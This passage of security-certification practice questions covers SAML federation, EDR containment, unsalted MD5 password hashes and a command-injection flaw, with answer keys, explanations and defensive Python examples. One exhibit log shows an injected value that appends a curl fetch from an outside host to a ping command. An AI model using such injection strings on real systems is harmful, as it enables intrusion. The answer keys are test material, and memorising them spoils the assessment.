Why wrong: NFC skimming targets very close-range contactless communication, such as badges or payment cards. The exhibit is about wireless network access.
- D
DNS poisoning
Why wrong: DNS poisoning manipulates name resolution. The evidence here is a fake wireless access point, not a changed DNS record.
Based on the exhibit, which integration best lets the SaaS application trust the company's existing identity provider so users can sign in with their corporate credentials?
Exhibit
SaaS sign-in settings:
- Local accounts: Enabled
- SAML SSO: Disabled
- SCIM provisioning: Disabled
- Password synchronization: Disabled
Requirement: users from the acquired subsidiary must use their existing corporate identities without separate SaaS passwords.
- A
Establish SAML federation so the SaaS app trusts the corporate identity provider.
Federation lets the SaaS app accept authentication assertions from the trusted identity provider, eliminating separate passwords.
- B
Enable password synchronization so the SaaS app stores the same password as the directory.
Why wrong: Password synchronization still leaves the SaaS app managing credentials instead of trusting the external identity provider.
- C
Create a shared local administrator account for all subsidiary users.
Why wrong: A shared account breaks accountability and does not provide individual user authentication or centralized trust.
- D
Configure MAC address filtering on company laptops to allow portal access.
Why wrong: MAC filtering controls device access, not user authentication, and it cannot provide federated sign-in.
Based on the exhibit, what should the analyst do next to limit the impact of the suspected compromise?
Exhibit
EDR Alert Summary
Host: FIN-LT-22
Severity: High
Detection: Suspicious PowerShell with encoded command
Parent Process: winword.exe
Network Activity: outbound connection to 203.0.113.77:4444
User Note: 'The laptop is running very slowly and pop-ups started after opening an attachment.'
- A
Run a full antivirus scan first and wait for the results before taking any other action.
Why wrong: A scan is useful later, but it does not immediately stop possible spread or attacker activity.
- B
Isolate FIN-LT-22 from the network to contain the suspected malware activity.
Network isolation is the best immediate containment step when an endpoint shows signs of active malicious behavior. It limits further command-and-control traffic, prevents lateral movement, and buys time for investigation. In incident response, containment comes before eradication and recovery when the threat is still active.
- C
Reboot the laptop to clear the malicious process from memory.
Why wrong: Rebooting can destroy volatile evidence and may not stop persistence mechanisms from reloading afterward.
- D
Reset the user's password and close the ticket after confirming they can log in again.
Why wrong: Changing a password may help if credentials were stolen, but it does not stop the endpoint infection.
Based on the exhibit, which change would most improve the security of the stored password data?
Exhibit
Database sample
users.password_hash
--------------------------------
alex  5f4dcc3b5aa765d61d8327deb882cf99
mira  202cb962ac59075b964b07152d234b70
sam   098f6bcd4621d373cade4e832627b4f6
Developer note:
- Passwords are hashed before storage
- The application does not currently store any salt values
- A
Store the passwords in encrypted form so they can be recovered later if needed.
Why wrong: Encryption is reversible, which is not ideal for password storage. If the key is exposed, passwords can be recovered.
- B
Add a unique salt per password and use a slow password hashing algorithm.
A unique salt defeats precomputed rainbow tables and ensures identical passwords do not produce identical stored values. Using a slow, purpose-built password hashing algorithm also increases the cost of offline cracking attempts.
- C
Replace the hash with a plain SHA-256 digest because it is modern and widely supported.
Why wrong: A fast general-purpose hash without salt is still vulnerable to offline guessing and precomputed attacks. It is not enough for password storage.
- D
Append the application name to each password before hashing to make the hashes unique.
Why wrong: A fixed application string is not a unique per-user salt. It does not meaningfully prevent identical hashes for identical passwords within the same system.
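To show the difference between the exhibit's unsalted fast hash and the salted, slow hash that option B describes, here is an added Python example; it is not part of the original question or any product, and the scrypt work factors and the constructed user rows are assumptions:

```python
import hashlib
import hmac
import os

def weak_hash(password: str) -> str:
    """The exhibit's scheme: a fast, unsalted digest (MD5).
    Every user who picks the same password gets the same stored value."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()

# scrypt work factors chosen for this example (assumption); tune per deployment.
SCRYPT_N, SCRYPT_R, SCRYPT_P, DKLEN = 2 ** 14, 8, 1, 32
SALT_LEN = 16  # bytes of random salt generated per password

def strong_hash(password: str, salt: bytes = b"") -> str:
    """Unique random salt plus a slow, memory-hard hash.
    Stored as 'scrypt$<salt hex>$<digest hex>' so verification can recover the salt."""
    if not salt:
        salt = os.urandom(SALT_LEN)
    digest = hashlib.scrypt(password.encode("utf-8"), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=DKLEN)
    return f"scrypt${salt.hex()}${digest.hex()}"

def verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 3 or parts[0] != "scrypt":
        return False
    recomputed = strong_hash(password, bytes.fromhex(parts[1]))
    return hmac.compare_digest(recomputed, stored)

def duplicate_hash_groups(rows: dict) -> list:
    """Audit check: usernames whose stored values are identical.
    Under the weak scheme this reveals users sharing a password."""
    by_hash = {}
    for user, stored in rows.items():
        by_hash.setdefault(stored, []).append(user)
    return [sorted(users) for users in by_hash.values() if len(users) > 1]

# Constructed rows (not the exhibit's users): two people chose the same password.
SAMPLE_USERS = [("alex", "password"), ("mira", "123"), ("dana", "password")]
WEAK_TABLE = {u: weak_hash(p) for u, p in SAMPLE_USERS}
STRONG_TABLE = {u: strong_hash(p) for u, p in SAMPLE_USERS}
```

With the weak scheme the audit flags alex and dana as sharing a stored value; with per-user salts the same two passwords produce different rows, and only verify() can tell they match.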
Based on the exhibit, what is the BEST remediation for the application flaw shown?
A user-controlled parameter is being passed to a shell command on the server. The application is intended to test connectivity to approved internal hosts only.
Exhibit
Application log excerpt:
15:08:02 POST /tools/pingHost host=10.0.0.15
15:08:02 Application executed: /bin/sh -c "ping -c 1 10.0.0.15"
15:09:11 POST /tools/pingHost host=10.0.0.15;curl%20http://198.51.100.55/s
15:09:11 Application executed: /bin/sh -c "ping -c 1 10.0.0.15;curl http://198.51.100.55/s"
15:09:12 Outbound HTTPS session established to 198.51.100.55
- A
Keep the current shell command, but add HTML encoding to the response page.
Why wrong: Output encoding helps prevent browser-side issues, but it does not stop command injection on the server.
- B
Replace the shell call with a safe library function and strictly allowlist approved host values.
The flaw is server-side command injection caused by passing user input into a shell. A safe library call removes shell interpretation, and an allowlist limits inputs to known-good targets.
- C
Increase the web server timeout so the ping utility has more time to complete.
Why wrong: Timeout tuning does not prevent an attacker from appending extra shell commands to the request.
- D
Require users to authenticate before they can access the page.
Why wrong: Authentication may reduce exposure, but it does not correct the underlying unsafe command execution.
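The remediation in option B, as an added Python example that is not from the original question or any product; the approved-host list and the handler name are assumptions:

```python
import ipaddress
import subprocess

# Constructed allowlist standing in for the "approved internal hosts" in the question.
APPROVED_HOSTS = frozenset({"10.0.0.15", "10.0.0.16"})

def build_vulnerable_command(host: str) -> str:
    """The exhibit's pattern: raw input interpolated into a shell string.
    The ';' in the second request becomes a command separator. Never executed here."""
    return f'/bin/sh -c "ping -c 1 {host}"'

def is_approved_host(host: str) -> bool:
    """Strict allowlist: the value must parse as an IP address AND be on the list.
    Input containing shell metacharacters fails to parse and is rejected."""
    try:
        addr = ipaddress.ip_address(host.strip())
    except ValueError:
        return False
    return str(addr) in APPROVED_HOSTS

def build_safe_argv(host: str) -> list:
    """Argument vector for subprocess with shell=False: each element reaches
    ping unchanged, so no shell ever interprets the user's input."""
    if not is_approved_host(host):
        raise ValueError(f"host not approved: {host!r}")
    return ["ping", "-c", "1", str(ipaddress.ip_address(host.strip()))]

def ping_host(host: str, timeout: float = 5.0) -> bool:
    """Hypothetical replacement for the /tools/pingHost handler's exec call."""
    result = subprocess.run(build_safe_argv(host), shell=False,
                            capture_output=True, timeout=timeout, check=False)
    return result.returncode == 0

# Constructed inputs mirroring the two requests in the exhibit.
BENIGN_INPUT = "10.0.0.15"
INJECTION_INPUT = "10.0.0.15;curl http://198.51.100.55/s"
```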